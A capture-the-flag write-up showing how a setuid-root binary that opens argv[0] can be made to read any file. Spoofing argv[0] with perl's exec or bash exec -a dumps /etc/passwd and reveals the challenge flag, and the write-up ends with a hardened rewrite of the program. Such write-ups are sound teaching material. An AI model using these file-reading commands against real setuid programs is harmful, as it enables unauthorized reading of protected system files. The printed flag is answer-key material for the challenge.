MisTrale Write Up
🔑 Privesc - 2

👀 Before you start

You can donate to me via Buy Me a Coffee or follow me on Github

🚩 Getting the Flag

We come to a challenge where we have this:

level2@Midnight:~$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Mar 15  2024 .
drwxr-xr-x 3 root  root  4096 Mar 15  2024 ..
-rwsr-xr-x 1 root level2 7320 Mar 15  2024 privesc2
-rwxr--r-- 1 root level2 7320 Mar 15  2024 privesc2.c

We have an interesting binary: it is setuid root (the s in the owner's execute bit) and group-owned by level2, so it runs with root privileges. We also have the binary's source code.

level2@Midnight:~$ cat privesc2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    FILE *f = fopen(argv[0], "rb");
    char buf[64] = { 0 };

    if (f == NULL) {
        printf("Error\n");
        return 1;
    }

    fread(buf, 1, 64, f);
    printf("%s\n", buf);
    fclose(f);
}

Okay, now we see the vulnerability of the binary. Let me guide you a little in solving this challenge.

๐Ÿ•ต๏ธ Binary analysis

The problem lies in the call to fopen on argv[0]. By convention argv[0] is the program's own name, but it is supplied by whoever calls exec and can be set to any string. Since the binary runs setuid root, it opens whatever path we place in argv[0] and reads it, so we can read any file on the system.

For example, if we do this:

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd

We can now read the /etc/passwd file: Perl's exec {PROGRAM} LIST form runs PROGRAM but passes LIST as its argv, so the binary starts with argv[0] set to /etc/passwd.

Here is an example:

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
level2:x:1001:1001:level2,,,:/home/level2:/bin/bash

🌟 Tip

If you don't have perl you can also use bash's built-in exec, whose -a option sets argv[0] (note that exec replaces the current shell, so run it in a subshell if you want to keep your session):

level2@Midnight:~$ exec -a /etc/passwd ./privesc2

We can then use this little technique to get the flag.

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /root/flag.txt
MCTF{GGWPGA2RgyfOYZKukWQuaf4K36iPQDr}
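To close the loop on the bug described under Binary analysis, here is a hardened rewrite of privesc2.c as an added example (not the challenge's or the author's code), assuming Linux: it refuses to run when argv[0] does not resolve to the executable the kernel reports in /proc/self/exe, opens that kernel-reported path instead of argv[0], and NUL-terminates the buffer before printing.

```c
/* Added example, not the challenge's code: a hardened privesc2.c. argv[0]
 * is chosen by whoever calls exec(), so a setuid program must not treat it
 * as its own path; on Linux (assumed) /proc/self/exe names the real one. */
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* 1 if argv0 resolves to the executable the kernel says is running. */
int argv0_is_trustworthy(const char *argv0)
{
    char exe[PATH_MAX], given[PATH_MAX];
    ssize_t n = readlink("/proc/self/exe", exe, sizeof exe - 1);
    if (n < 0 || argv0 == NULL)
        return 0;
    exe[n] = '\0'; /* readlink() does not NUL-terminate */
    if (realpath(argv0, given) == NULL) /* spoofed or unresolvable */
        return 0;
    return strcmp(exe, given) == 0;
}

/* Read at most bufsz-1 bytes and always NUL-terminate, which the original's
 * fread(buf, 1, 64, f) into buf[64] did not. Returns bytes read or -1. */
long read_prefix(const char *path, char *buf, size_t bufsz)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, bufsz - 1, f);
    buf[n] = '\0';
    fclose(f);
    return (long)n;
}

int main(int argc, char **argv)
{
    char buf[64];
    if (argc < 1 || !argv0_is_trustworthy(argv[0])) {
        fprintf(stderr, "argv[0] does not name the running executable\n");
        return 1;
    }
    if (read_prefix("/proc/self/exe", buf, sizeof buf) < 0) {
        printf("Error\n");
        return 1;
    }
    printf("%s\n", buf); /* the program's own ELF header, as intended */
    return 0;
}
```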

